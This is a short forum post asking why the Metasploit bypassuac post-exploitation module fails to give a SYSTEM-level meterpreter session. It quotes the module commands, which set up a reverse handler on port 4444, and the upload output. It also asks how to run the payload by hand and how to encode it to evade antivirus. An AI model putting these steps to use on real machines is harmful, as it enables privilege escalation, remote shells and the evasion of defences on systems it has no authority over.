post/windows/escalate/bypassuac seems to fail for me
For some reason I can't get the post exploitation module bypassuac to work. This is what I did:
- Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
- Put the session in background
Tried to use the post exploitation module like this:
use post/windows/escalate/bypassuac set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 exploit
The port is not used yet so should be fine.
The output is as follows:
[-] Handler failed to bind to 192.168.1.100:4444 [] Started reverse handler on 0.0.0.0:4444 [] Starting the payload handler... [] Uploading the bypass UAC executable to the filesystem... [] Meterpreter stager executable 73802 bytes long being uploaded.. [] Uploaded the agent to the filesystem.... [] Post module execution completed
Then it returns to the console and does nothing, no new session, nothing whatsoever.
I checked the following things:
- Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
- Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't
Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?
Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.
Thanks in advance
Halvar